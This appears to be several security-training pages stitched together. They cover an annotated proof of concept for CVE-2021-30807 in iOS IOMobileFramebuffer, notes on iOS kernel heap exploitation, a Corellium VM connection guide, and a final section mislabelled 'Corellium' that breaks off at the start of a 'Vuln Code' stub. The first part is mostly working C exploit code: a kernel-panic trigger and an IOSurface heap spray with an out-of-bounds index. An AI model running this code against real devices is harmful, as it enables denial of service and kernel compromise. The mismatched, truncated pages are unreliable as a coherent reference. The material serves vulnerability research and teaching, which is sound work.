> The initial function to call `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)` is protected by the entitlement **`com.apple.private.allow-explicit-graphics-priority`**. However, **WebKit.WebContent** has this entitlement, so it can be used to trigger the vuln from a sandboxed process.
## DoS PoC
The following is the initial DoS PoC from the ooriginal blog post with extra comments:
```c
// PoC for CVE-2021-30807 trigger (annotated)
// NOTE: This demonstrates the crash trigger; it is NOT an LPE.
// Build/run only on devices you own and that are vulnerable.
// Patched in iOS/iPadOS 14.7.1, macOS 11.5.1, watchOS 7.6.1. (Apple advisory)
// https://support.apple.com/en-us/103144
// https://nvd.nist.gov/vuln/detail/CVE-2021-30807
void trigger_clcd_vuln(void) {
kern_return_t ret;
io_connect_t shared_user_client_conn = MACH_PORT_NULL;
// The "type" argument is the type (selector) of user client to open.
// For IOMobileFramebuffer, 2 typically maps to a user client that exposes the
// external methods we need (incl. selector 83). If this doesn't work on your
// build, try different types or query IORegistry to enumerate.
int type = 2;
// 1) Locate the IOMobileFramebuffer service in the IORegistry.
// This returns the first matched service object (a kernel object handle).
io_service_t service = IOServiceGetMatchingService(
kIOMasterPortDefault,
IOServiceMatching("IOMobileFramebuffer"));
if (service == MACH_PORT_NULL) {
printf("failed to open service\n");
return;
}
printf("service: 0x%x\n", service);
// 2) Open a connection (user client) to the service.
// The user client is what exposes external methods to userland.
// 'type' selects which user client class/variant to instantiate.
ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
if (ret != KERN_SUCCESS) {
printf("failed to open userclient: %s\n", mach_error_string(ret));
return;
}
printf("client: 0x%x\n", shared_user_client_conn);
printf("call externalMethod\n");
// 3) Prepare input scalars for the external method call.
// The vulnerable path uses a 32-bit scalar as an INDEX into an internal
// array of pointers WITHOUT bounds checking (OOB read / type confusion).
// We set it to a large value to force the out-of-bounds access.
uint64_t scalars[4] = { 0x0 };
scalars[0] = 0x41414141; // **Attacker-controlled index** → OOB pointer lookup
// 4) Prepare output buffers (the method returns a scalar, e.g. a surface ID).
uint64_t output_scalars[4] = { 0 };
uint32_t output_scalars_size = 1;
printf("call s_default_fb_surface\n");
// 5) Invoke external method #83.
// On vulnerable builds, this path ends up calling:
// IOMobileFramebufferUserClient::s_displayed_fb_surface(...)
// → IOMobileFramebufferLegacy::get_displayed_surface(...)
// which uses our index to read a pointer and then passes it as IOSurface*.
// If the pointer is bogus, IOSurface code will dereference it and the kernel
// will panic (DoS).
ret = IOConnectCallMethod(
shared_user_client_conn,
83, // **Selector 83**: vulnerable external method
scalars, 1, // input scalars (count = 1; the OOB index)
NULL, 0, // no input struct
output_scalars, &output_scalars_size, // optional outputs
NULL, NULL); // no output struct
// 6) Check the call result. On many vulnerable targets, you'll see either
// KERN_SUCCESS right before a panic (because the deref happens deeper),
// or an error if the call path rejects the request (e.g., entitlement/type).
if (ret != KERN_SUCCESS) {
printf("failed to call external method: 0x%x --> %s\n",
ret, mach_error_string(ret));
return;
}
printf("external method returned KERN_SUCCESS\n");
// 7) Clean up the user client connection handle.
IOServiceClose(shared_user_client_conn);
printf("success!\n");
}
```
## Arbitrary Read PoC Explained
1. **Opening the right user client**
- `get_appleclcd_uc()` finds the **AppleCLCD** service and opens **user client type 2**. AppleCLCD and IOMobileFramebuffer share the same external-methods table; type 2 exposes **selector 83**, the vulnerable method. **This is your entry point to the bug.**
**Why 83 matters:** the decompiled path is:
- `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`\
`IOMobileFramebufferUserClient::get_displayed_surface(...)`\
`IOMobileFramebufferLegacy::get_displayed_surface(...)`\
Inside the last call, the code **uses your 32-bit scalar as an array index with no bounds check**, fetches a pointer from **`this + 0xA58 + index*8`**, and **passes it as an `IOSurface*`** to `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)`. **That is the OOB + type confusion.**
2. **The heap spray (why IOSurface shows up here)**
- `do_spray()` uses **`IOSurfaceRootUserClient`** to **create many IOSurfaces** and **spray small values** (`s_set_value` style). This fills the kernel heap near **pointers to legitimate IOSurface objects**.
- **Goal:** when selector 83 reads past the legitimate table, the OOB slot is likely to hold a pointer to one of your (legitimate) IOSurfaces, so the later dereference **does not crash** and **succeeds**. IOSurface is a classic, well-documented kernel spray primitive, and Saar's post explicitly lists the **create / set_value / lookup** paths used in this exploit flow.
3. **The "offset/8" trick (what that index really is)**
- In `trigger_oob(offset)`, you set `scalars[0] = offset / 8`.
- **Why divide by 8?** The kernel computes **`base + index*8`** to decide which pointer-sized slot to read. You are choosing **"slot number N"**, not a byte offset. **Slots are eight bytes each** on 64-bit.
- The computed address is **`this + 0xA58 + index*8`**. The PoC uses a large constant (`0x1200000 + 0x1048`) in order to land **far out of bounds**, in a region you have tried to **densely fill with IOSurface pointers**. **If the spray "wins", the slot you hit is a valid `IOSurface*`.**
4. **What selector 83 returns (this is the subtle part)**
- The call is:
`IOConnectCallMethod(appleclcd_uc, 83, scalars, 1, NULL, 0, output_scalars, &output_scalars_size, NULL, NULL);`
- Internally, after the OOB pointer fetch, the driver calls\
**`IOSurfaceRoot::copyPortNameForSurfaceInTask(task, IOSurface*, out_u32*)`**.
- **Result:** **`output_scalars[0]` is a Mach port name (u32 handle) in your task** for *whatever object pointer you fed it through the OOB*. **It is not a raw kernel address leak; it is a userspace handle (send right).** This exact behavior (copying a *port name*) is visible in Saar's decompilation.
**Why this matters:** with a **port name** for a (presumed) IOSurface, you can now use **IOSurfaceRoot methods** such as:
- **`s_lookup_surface_from_port` (method 34)** → turn the port into a **surface ID** you can operate on through other IOSurface calls, and
- **`s_create_port_from_surface` (method 35)** if you need the reverse.\
Saar discusses exactly these methods as the next step. **The PoC shows that you can "manufacture" a valid IOSurface handle from an OOB slot.** [Saaramar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/?utm_source=chatgpt.com)
This [PoC was taken from here](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC/blob/main/poc/exploit.c), with some comments added to explain the steps:
```c
#include "exploit.h"
// Open the AppleCLCD (aka IOMFB) user client so we can call external methods.
io_connect_t get_appleclcd_uc(void) {
kern_return_t ret;
io_connect_t shared_user_client_conn = MACH_PORT_NULL;
int type = 2; // **UserClient type**: variant that exposes selector 83 on affected builds. ⭐
// (AppleCLCD and IOMobileFramebuffer share the same external methods table.)
// Find the **AppleCLCD** service in the IORegistry.
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("AppleCLCD"));
if(service == MACH_PORT_NULL) {
printf("[-] failed to open service\n");
return MACH_PORT_NULL;
}
printf("[*] AppleCLCD service: 0x%x\n", service);
// Open a user client connection to AppleCLCD with the chosen **type**.
ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
if(ret != KERN_SUCCESS) {
printf("[-] failed to open userclient: %s\n", mach_error_string(ret));
return MACH_PORT_NULL;
}
printf("[*] AppleCLCD userclient: 0x%x\n", shared_user_client_conn);
return shared_user_client_conn;
}
// Trigger the OOB index path of external method #83.
// The 'offset' you pass is in bytes; dividing by 8 converts it to the
// index of an 8-byte pointer slot in the internal table at (this + 0xA58).
uint64_t trigger_oob(uint64_t offset) {
kern_return_t ret;
// The method takes a single 32-bit scalar that it uses as an index.
uint64_t scalars[1] = { 0x0 };
scalars[0] = offset / 8; // **index = byteOffset / sizeof(void*)**. ⭐
// #83 returns one scalar. In this flow it will be the Mach port name
// (a u32 handle in our task), not a kernel pointer.
uint64_t output_scalars[1] = { 0 };
uint32_t output_scalars_size = 1;
io_connect_t appleclcd_uc = get_appleclcd_uc();
if (appleclcd_uc == MACH_PORT_NULL) {
return 0;
}
// Call external method 83. Internally:
// ptr = *(this + 0xA58 + index*8); // OOB pointer fetch
// IOSurfaceRoot::copyPortNameForSurfaceInTask(task, (IOSurface*)ptr, &out)
// which creates a send right for that object and writes its port name
// into output_scalars[0]. If ptr is junk → deref/panic (DoS).
ret = IOConnectCallMethod(appleclcd_uc, 83,
scalars, 1,
NULL, 0,
output_scalars, &output_scalars_size,
NULL, NULL);
if (ret != KERN_SUCCESS) {
printf("[-] external method 83 failed: %s\n", mach_error_string(ret));
return 0;
}
// This is the key: you get back a Mach port name (u32) to whatever
// object was at that OOB slot (ideally an IOSurface you sprayed).
printf("[*] external method 83 returned: 0x%llx\n", output_scalars[0]);
return output_scalars[0];
}
// Heap-shape with IOSurfaces so an OOB slot likely contains a pointer to a
// real IOSurface (easier & stabler than a fully fake object).
bool do_spray(void) {
char data[0x10];
memset(data, 0x41, sizeof(data)); // Tiny payload for value spraying.
// Get IOSurfaceRootUserClient (reachable from sandbox/WebContent).
io_connect_t iosurface_uc = get_iosurface_root_uc();
if (iosurface_uc == MACH_PORT_NULL) {
printf("[-] do_spray: failed to allocate new iosurface_uc\n");
return false;
}
// Create many IOSurfaces and use set_value / value spray helpers
// (Brandon Azad-style) to fan out allocations in kalloc. ⭐
int *surface_ids = (int*)malloc(SURFACES_COUNT * sizeof(int));
for (size_t i = 0; i < SURFACES_COUNT; ++i) {
surface_ids[i] = create_surface(iosurface_uc); // s_create_surface
if (surface_ids[i] <= 0) {
return false;
}
// Spray small values repeatedly: tends to allocate/fill predictable
// kalloc regions near where the IOMFB table OOB will read from.
// The “with_gc” flavor forces periodic GC to keep memory moving/packed.
if (IOSurface_spray_with_gc(iosurface_uc, surface_ids[i],
20, 200, // rounds, per-round items
data, sizeof(data),
NULL) == false) {
printf("iosurface spray failed\n");
return false;
}
}
return true;
}
int main(void) {
// Ensure we can talk to IOSurfaceRoot (some helpers depend on it).
io_connect_t iosurface_uc = get_iosurface_root_uc();
if (iosurface_uc == MACH_PORT_NULL) {
return 0;
}
printf("[*] do spray\n");
if (do_spray() == false) {
printf("[-] shape failed, abort\n");
return 1;
}
printf("[*] spray success\n");
// Trigger the OOB read. The magic constant chooses a pointer-slot
// far beyond the legit array (offset is in bytes; index = offset/8).
// If the spray worked, this returns a **Mach port name** (handle) to one
// of your sprayed IOSurfaces; otherwise it may crash.
printf("[*] trigger\n");
trigger_oob(0x1200000 + 0x1048);
return 0;
}
```
## References
- [Original write-up by Saar Amar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/)
- [Exploit PoC code](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC)
- [Research from jsherman212](https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html?utm_source=chatgpt.com)
{{#include ../../banners/hacktricks-training.md}}


@ -0,0 +1,271 @@
# iOS Exploiting
{{#include ../../banners/hacktricks-training.md}}
## iOS Exploit Mitigations
- **Code Signing** in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple's trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively blocking most exploit chains that rely on executing arbitrary or tampered code.
- **CoreTrust** is the iOS subsystem responsible for enforcing code signing at runtime. It verifies signatures directly against Apple's root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can run. CoreTrust ensures that even if an attacker modifies an app after installation, alters system libraries, or tries to load unsigned code, the system refuses execution unless the code is still correctly signed. This strict enforcement closes many post-exploitation paths that older iOS versions allowed through weaker or bypassable checks.
- **Data Execution Prevention (DEP)** marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (such as the stack or heap) and running it, forcing them to use more complex techniques such as ROP (Return-Oriented Programming).
- **ASLR (Address Space Layout Randomization)** randomizes the memory addresses of code, libraries, stack, and heap every time the system boots. This makes it much harder for attackers to predict where instructions or gadgets will be located, breaking many exploit chains that depend on fixed memory layouts.
- **KASLR (Kernel ASLR)** applies the same randomization idea to the iOS kernel. By shuffling the kernel's base address on each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise grant full system control.
- **Kernel Patch Protection (KPP)**, also known as **AMCC (Apple Mobile File Integrity)** in iOS, continuously monitors the kernel's code pages to ensure they have not been modified. If tampering is detected, such as an exploit trying to patch kernel functions or insert malicious code, the device immediately panics and restarts. This protection makes persistent kernel exploits far harder, because attackers cannot simply hook or patch kernel instructions without causing a system crash.
- **Kernel Text Readonly Region (KTRR)** is a hardware-backed security feature introduced on iOS devices. It uses the CPU's memory controller to mark the kernel's code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers, and even privileged code, from patching kernel instructions at runtime, closing a large class of exploits that rely on directly modifying kernel code.
- **Pointer Authentication Codes (PAC)** use cryptographic signatures embedded in the unused bits of pointers to verify their integrity before use. When a pointer (such as a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer has been tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques such as ROP or JOP far harder to carry out reliably.
- **Privileged Access Never (PAN)** is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it is explicitly enabled to do so. This stops attackers who have gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
- **Page Protection Layer (PPL)** is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who have gained kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses much harder.
## Old Kernel Heap (Pre-iOS 15 / Pre-A12 era)
The kernel used a **zone allocator** (`kalloc`) split into fixed-size "zones".
Each zone held allocations of a single size class only.
From the screenshot:
| Zone Name | Element Size | Example Use |
|----------------------|--------------|-----------------------------------------------------------------------------|
| `default.kalloc.16` | 16 bytes | Very small kernel structs, pointers. |
| `default.kalloc.32` | 32 bytes | Small structs, object headers. |
| `default.kalloc.64` | 64 bytes | IPC messages, tiny kernel buffers. |
| `default.kalloc.128` | 128 bytes | Medium objects like parts of `OSObject`. |
| `default.kalloc.256` | 256 bytes | Larger IPC messages, arrays, device structures. |
| … | … | … |
| `default.kalloc.1280`| 1280 bytes | Large structures, IOSurface/graphics metadata. |
**How it worked:**
- Each allocation request is rounded up to the nearest zone size. (For example, a 50-byte request goes to the `kalloc.64` zone.)
- Memory in each zone was kept on a freelist; chunks freed by the kernel went back to that zone.
- If you overflowed a 64-byte buffer, you would overwrite the next object in the same zone.
This is why **heap spraying / feng shui** was so effective: you could predict an object's neighbors by flooding allocations of the same size class.
### The freelist
Inside each kalloc zone, freed objects were not returned directly to the system; they went onto the freelist, a linked list of available chunks.
- When a chunk was freed, the kernel wrote a pointer at the start of that chunk → the address of the next free chunk in the same zone.
- The zone kept a HEAD pointer to the first free chunk.
- Allocation always used the current HEAD:
1. Pop HEAD (return that memory to the caller).
2. Update HEAD = HEAD->next (stored in the freed chunk's header).
- Freeing pushed chunks back:
- `freed_chunk->next = HEAD`
- `HEAD = freed_chunk`
So the freelist was just a linked list built inside the freed memory itself.
Normal state:
```
Zone page (64-byte chunks for example):
[ A ] [ F ] [ F ] [ A ] [ F ] [ A ] [ F ]
Freelist view:
HEAD ──► [ F ] ──► [ F ] ──► [ F ] ──► [ F ] ──► NULL
(next ptrs stored at start of freed chunks)
```
### Exploiting the freelist
Because the first 8 bytes of a free chunk = the freelist pointer, an attacker could corrupt it:
1. **Heap overflow** into an adjacent freed chunk → overwrite its "next" pointer.
2. **Use-after-free** writing into a freed object → overwrite its "next" pointer.
Then, on the next allocation of that size:
- The allocator pops the corrupted chunk.
- It follows the attacker-supplied "next" pointer.
- It returns a pointer to arbitrary memory, enabling fake object primitives or targeted overwrites.
Visual example of freelist poisoning:
```
Before corruption:
HEAD ──► [ F1 ] ──► [ F2 ] ──► [ F3 ] ──► NULL
After attacker overwrite of F1->next:
HEAD ──► [ F1 ]
(next) ──► 0xDEAD_BEEF_CAFE_BABE (attacker-chosen)
Next alloc of this zone → kernel hands out memory at attacker-controlled address.
```
This freelist design made exploitation highly effective pre-hardening: predictable neighbors from heap sprays, raw pointer freelist links, and no type separation allowed attackers to escalate UAF/overflow bugs into arbitrary kernel memory control.
### Heap Grooming / Feng Shui
The goal of heap grooming is to **shape the heap layout** so that when an attacker triggers an overflow or use-after-free, the target (victim) object sits right next to an attacker-controlled object.\
That way, when memory corruption happens, the attacker can reliably overwrite the victim object with controlled data.
**Steps:**
1. Spray allocations (fill the holes)
- Over time, the kernel heap gets fragmented: some zones have holes where old
objects were freed.
- The attacker first makes lots of dummy allocations to fill these gaps, so
the heap becomes “packed” and predictable.
2. Force new pages
- Once the holes are filled, the next allocations must come from new pages
added to the zone.
- Fresh pages mean objects will be clustered together, not scattered across
old fragmented memory.
- This gives the attacker much better control of neighbors.
3. Place attacker objects
- The attacker now sprays again, creating lots of attacker-controlled objects
in those new pages.
- These objects are predictable in size and placement (since they all belong
to the same zone).
4. Free a controlled object (make a gap)
- The attacker deliberately frees one of their own objects.
- This creates a “hole” in the heap, which the allocator will later reuse for
the next allocation of that size.
5. Victim object lands in the hole
- The attacker triggers the kernel to allocate the victim object (the one
they want to corrupt).
- Since the hole is the first available slot in the freelist, the victim is
placed exactly where the attacker freed their object.
6. Overflow / UAF into victim
- Now the attacker has attacker-controlled objects around the victim.
- By overflowing from one of their own objects (or reusing a freed one), they
can reliably overwrite the victim's memory fields with chosen values.
**Why it works**:
- Zone allocator predictability: allocations of the same size always come from
the same zone.
- Freelist behavior: new allocations reuse the most recently freed chunk first.
- Heap sprays: attacker fills memory with predictable content and controls layout.
- End result: attacker controls where the victim object lands and what data sits
next to it.
---
## Modern Kernel Heap (iOS 15+/A12+ SoCs)
Apple hardened the allocator and made **heap grooming much harder**:
### 1. From Classic kalloc to kalloc_type
- **Before**: a single `kalloc.<size>` zone existed for each size class (16, 32, 64, … 1280, etc.). Any object of that size was placed there → attacker objects could sit next to privileged kernel objects.
- **Now**:
- Kernel objects are allocated from **typed zones** (`kalloc_type`).
- Each type of object (e.g., `ipc_port_t`, `task_t`, `OSString`, `OSData`) has its own dedicated zone, even if they're the same size.
- The mapping between object type ↔ zone is generated from the **kalloc_type system** at compile time.
An attacker can no longer guarantee that controlled data (`OSData`) ends up adjacent to sensitive kernel objects (`task_t`) of the same size.
### 2. Slabs and Per-CPU Caches
- The heap is divided into **slabs** (pages of memory carved into fixed-size chunks for that zone).
- Each zone has a **per-CPU cache** to reduce contention.
- Allocation path:
1. Try per-CPU cache.
2. If empty, pull from the global freelist.
3. If freelist is empty, allocate a new slab (one or more pages).
- **Benefit**: This decentralization makes heap sprays less deterministic, since allocations may be satisfied from different CPUs' caches.
### 3. Randomization inside zones
- Within a zone, freed elements are not handed back in simple FIFO/LIFO order.
- Modern XNU uses **encoded freelist pointers** (safe-linking like Linux, introduced ~iOS 14).
- Each freelist pointer is **XOR-encoded** with a per-zone secret cookie.
- This prevents attackers from forging a fake freelist pointer if they gain a write primitive.
- Some allocations are **randomized in their placement within a slab**, so spraying doesn't guarantee adjacency.
### 4. Guarded Allocations
- Certain critical kernel objects (e.g., credentials, task structures) are allocated in **guarded zones**.
- These zones insert **guard pages** (unmapped memory) between slabs or use **redzones** around objects.
- Any overflow into the guard page triggers a fault → immediate panic instead of silent corruption.
### 5. Page Protection Layer (PPL) and SPTM
- Even if you control a freed object, you can't modify all of kernel memory:
- **PPL (Page Protection Layer)** enforces that certain regions (e.g., code signing data, entitlements) are **read-only** even to the kernel itself.
- On **A15/M2+ devices**, this role is replaced/enhanced by **SPTM (Secure Page Table Monitor)** + **TXM (Trusted Execution Monitor)**.
- These hardware-enforced layers mean attackers can't escalate from a single heap corruption to arbitrary patching of critical security structures.
### 6. Large Allocations
- Not all allocations go through `kalloc_type`.
- Very large requests (above ~16KB) bypass typed zones and are served directly from **kernel VM (kmem)** via page allocations.
- These are less predictable, but also less exploitable, since they don't share slabs with other objects.
### 7. Allocation Patterns Attackers Target
Even with these protections, attackers still look for:
- **Reference count objects**: if you can tamper with retain/release counters, you may cause use-after-free.
- **Objects with function pointers (vtables)**: corrupting one still yields control flow.
- **Shared memory objects (IOSurface, Mach ports)**: these are still attack targets because they bridge user ↔ kernel.
But, unlike before, you can't just spray `OSData` and expect it to neighbor a `task_t`. You need **type-specific bugs** or **info leaks** to succeed.
### Example: Allocation Flow in Modern Heap
Suppose userspace calls into IOKit to allocate an `OSData` object:
1. **Type lookup**: `OSData` maps to the `kalloc_type_osdata` zone (size 64 bytes).
2. Check per-CPU cache for free elements.
- If found → return one.
- If empty → go to global freelist.
- If freelist empty → allocate a new slab (page of 4KB → 64 chunks of 64 bytes).
3. Return chunk to caller.
**Freelist pointer protection**:
- Each freed chunk stores the address of the next free chunk, but encoded with a secret key.
- Overwriting that field with attacker data won't work unless you know the key.
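Added example (not from the original page or from XNU): a small user-space model of the freelist described in "Exploiting the freelist" above, run once as the legacy raw-pointer freelist and once with XOR-encoded links plus a zone check as in this section, to show why overwriting a freed chunk's first 8 bytes used to yield an attacker-chosen allocation and why the encoded variant refuses it. Zone geometry, the cookie value and the out-of-zone target buffer are constructed assumptions.

```c
/* Added example (not from the original page): a user-space model of a
 * kalloc-style freelist. With cookie == 0 it behaves like the old raw-pointer
 * freelist; with a nonzero cookie the links are XOR-encoded (safe-linking
 * style) and sanity-checked on pop, as in the modern allocator.
 * Zone size, chunk size and the cookie value are constructed for the demo. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CHUNK_SIZE 64
#define NCHUNKS    8

typedef struct {
    uint8_t *base;       /* backing memory of the zone (NCHUNKS * CHUNK_SIZE) */
    uint8_t *head;       /* first free chunk, NULL when the zone is exhausted */
    uint64_t cookie;     /* per-zone secret; 0 models the legacy raw freelist */
    int      corrupted;  /* set when a decoded link fails the zone check */
} zone_t;

/* Constructed stand-in for memory outside the zone that a corrupted link
 * points at (in the kernel this would be some sensitive object). */
static uint64_t target_object[8];

static uint64_t encode_link(const zone_t *z, const uint8_t *p) {
    return (uint64_t)(uintptr_t)p ^ z->cookie;
}

static uint8_t *decode_link(const zone_t *z, uint64_t v) {
    return (uint8_t *)(uintptr_t)(v ^ z->cookie);
}

/* True if p is the start of one of this zone's chunks. */
static int in_zone(const zone_t *z, const uint8_t *p) {
    uintptr_t off = (uintptr_t)p - (uintptr_t)z->base;
    return off < (uintptr_t)(CHUNK_SIZE * NCHUNKS) && off % CHUNK_SIZE == 0;
}

/* freed_chunk->next = HEAD; HEAD = freed_chunk (link stored in the chunk). */
static void zone_free(zone_t *z, uint8_t *chunk) {
    uint64_t link = encode_link(z, z->head);
    memcpy(chunk, &link, sizeof link);
    z->head = chunk;
}

/* Pop HEAD and advance to HEAD->next. In hardened mode a decoded link that is
 * not a chunk of this zone is treated as corruption (the kernel would panic). */
static uint8_t *zone_alloc(zone_t *z) {
    uint8_t *chunk = z->head;
    if (chunk == NULL) return NULL;
    uint64_t link;
    memcpy(&link, chunk, sizeof link);
    uint8_t *next = decode_link(z, link);
    if (z->cookie != 0 && next != NULL && !in_zone(z, next)) {
        z->corrupted = 1;
        return NULL;
    }
    z->head = next;
    return chunk;
}

static void zone_init(zone_t *z, uint64_t cookie) {
    z->base = calloc(NCHUNKS, CHUNK_SIZE);
    z->head = NULL;
    z->cookie = cookie;
    z->corrupted = 0;
    for (int i = NCHUNKS - 1; i >= 0; i--)      /* HEAD -> chunk0 -> chunk1 ... */
        zone_free(z, z->base + i * CHUNK_SIZE);
}

/* Model of freelist poisoning: free f1 then f2 (HEAD -> f2 -> f1), overwrite
 * the link stored inside f2 with a raw address as a UAF or overflow would,
 * then allocate twice. Returns what the second allocation hands out, or NULL
 * if the allocator refused the corrupted link. */
static uint8_t *poison_and_allocate_twice(zone_t *z, uint8_t *fake_target) {
    uint8_t *f1 = zone_alloc(z);
    uint8_t *f2 = zone_alloc(z);
    zone_free(z, f1);
    zone_free(z, f2);
    uint64_t raw = (uint64_t)(uintptr_t)fake_target;   /* writer does not know the cookie */
    memcpy(f2, &raw, sizeof raw);
    if (zone_alloc(z) == NULL) return NULL;            /* pops f2; HEAD := decoded link */
    return zone_alloc(z);                              /* legacy: returns fake_target */
}

int main(void) {
    zone_t legacy, hardened;
    zone_init(&legacy, 0);
    zone_init(&hardened, 0x5a5aa5a5c3c33c3cULL);
    uint8_t *got = poison_and_allocate_twice(&legacy, (uint8_t *)target_object);
    printf("legacy freelist handed out %p (target at %p)\n",
           (void *)got, (void *)target_object);
    got = poison_and_allocate_twice(&hardened, (uint8_t *)target_object);
    printf("hardened freelist: %s\n",
           (got == NULL && hardened.corrupted) ? "corruption detected" : "not detected");
    free(legacy.base);
    free(hardened.base);
    return 0;
}
```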
## Comparison Table
| Feature | **Old Heap (Pre-iOS 15)** | **Modern Heap (iOS 15+ / A12+)** |
|---------------------------------|------------------------------------------------------------|--------------------------------------------------|
| Allocation granularity | Fixed size buckets (`kalloc.16`, `kalloc.32`, etc.) | Size + **type-based buckets** (`kalloc_type`) |
| Placement predictability | High (same-size objects side by side) | Low (same-type grouping + randomness) |
| Freelist management | Raw pointers in freed chunks (easy to corrupt) | **Encoded pointers** (safe-linking style) |
| Adjacent object control | Easy via sprays/frees (feng shui predictable) | Hard — typed zones separate attacker objects |
| Kernel data/code protections | Few hardware protections | **PPL / SPTM** protect page tables & code pages |
| Exploit reliability | High with heap sprays | Much lower, requires logic bugs or info leaks |
## (Old) Physical Use-After-Free via IOSurface
{{#ref}}
ios-physical-uaf-iosurface.md
{{#endref}}
---
## Ghidra Install BinDiff
Download BinDiff DMG from [https://www.zynamics.com/bindiff/manual](https://www.zynamics.com/bindiff/manual) and install it.
Open Ghidra with `ghidraRun` and go to `File` --> `Install Extensions`, press the add button, select the path `/Applications/BinDiff/Extra/Ghidra/BinExport`, click OK and install it even if there is a version mismatch.
### Using BinDiff with Kernel versions
1. Go to the page [https://ipsw.me/](https://ipsw.me/) and download the iOS versions you want to diff. These will be `.ipsw` files.
2. Decompress until you get the bin format of the kernelcache of both `.ipsw` files. You have information on how to do this on:
{{#ref}}
../../macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
{{#endref}}
3. Open Ghidra with `ghidraRun`, create a new project and load the kernelcaches.
4. Open each kernelcache so they are automatically analyzed by Ghidra.
5. Then, on the project Window of Ghidra, right click each kernelcache, select `Export`, select format `Binary BinExport (v2) for BinDiff` and export them.
6. Open BinDiff, create a new workspace and add a new diff indicating as primary file the kernelcache that contains the vulnerability and as secondary file the patched kernelcache.
---
## Finding the right XNU version
If you want to check for vulnerabilities in a specific version of iOS, you can check which XNU release version the iOS version uses at [https://www.theiphonewiki.com/wiki/kernel](https://www.theiphonewiki.com/wiki/kernel).
For example, the versions `15.1 RC`, `15.1` and `15.1.1` use the version `Darwin Kernel Version 21.1.0: Wed Oct 13 19:14:48 PDT 2021; root:xnu-8019.43.1~1/RELEASE_ARM64_T8006`.
{{#include ../../banners/hacktricks-training.md}}


@ -0,0 +1,79 @@
# iOS How to Connect with Corellium
{{#include ../../banners/hacktricks-training.md}}
## **Requirements**
- A Corellium iOS VM (jailbroken or not). In this guide we assume you have access to Corellium.
- Local tools: **ssh/scp**.
- (Optional) **SSH keys** added to your Corellium project for password-less login.
## **Connect to the iPhone VM from localhost**
### A) **Quick Connect (no VPN)**
0) Add your ssh key in **`/admin/projects`** (recommended).
1) Open the device page → **Connect**
2) **Copy the Quick Connect SSH command** provided by Corellium and paste it into your terminal.
3) Enter the password or use your ssh key (recommended).
### B) **VPN → direct SSH**
0) Add your ssh key in **`/admin/projects`** (recommended).
1) Device page → **CONNECT** → **VPN** → download the `.ovpn` and connect with any VPN client that supports TAP mode. (See [https://support.corellium.com/features/connect/vpn](https://support.corellium.com/features/connect/vpn) if you run into problems.)
2) SSH to the VM's **10.11.x.x** address:
```bash
ssh root@10.11.1.1
```
## **Upload a native binary & execute it**
### 2.1 **Upload**
- If Quick Connect gave you a host/port:
```bash
scp -J <domain> ./mytool root@10.11.1.1:/var/root/mytool
```
- If you are using the VPN (10.11.x.x):
```bash
scp -J <domain> ./mytool root@10.11.1.1:/var/root/mytool
```
## **Upload & install an iOS app (.ipa)**
### Method A — **Web UI (fastest)**
1) Device page → **Apps** tab → **Install App** → select your `.ipa`.
2) From the same tab you can **launch/kill/uninstall**.
### Method B — **Scripted via the Corellium Agent**
1) Use the API Agent to **upload** and then **install**:
```js
// Node.js (pseudo) using Corellium Agent
await agent.upload("./app.ipa", "/var/tmp/app.ipa");
await agent.install("/var/tmp/app.ipa", (progress, status) => {
console.log(progress, status);
});
```
### Method C — **Non-jailbroken (proper signing / Sideloadly)**
- If you don't have a provisioning profile, use **Sideloadly** to re-sign with your Apple ID, or sign in Xcode.
- You can also expose the VM to Xcode using **USBFlux** (see §5).
- For quick logs/commands without SSH, use the device **Console** in the UI.
## **Extras**
- **Port-forwarding** (make the VM feel local for other tools):
```bash
# Forward local 2222 -> device 22
ssh -N -L 2222:127.0.0.1:22 root@10.11.1.1
# Now you can go through the forwarded port: scp -P 2222 file root@127.0.0.1:/var/root/
```
- **LLDB remote debugging**: use the **LLDB/GDB stub** address shown at the bottom of the device page (CONNECT → LLDB).
- **USBFlux (macOS/Linux)**: present the VM to **Xcode/Sideloadly** as a cable-connected device.
## **Common pitfalls**
- **Proper signing** is required on **non-jailbroken** devices; unsigned IPAs will not launch.
- **Quick Connect vs VPN**: Quick Connect is simpler; use **VPN** when you need the device on a local network (for example, local proxies/tools).
- **No App Store** on Corellium devices; bring your own (re)signed IPAs.
{{#include ../../banners/hacktricks-training.md}}


@ -0,0 +1,205 @@
# iOS How to Connect with Corellium
{{#include ../../banners/hacktricks-training.md}}
## Vuln Code
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
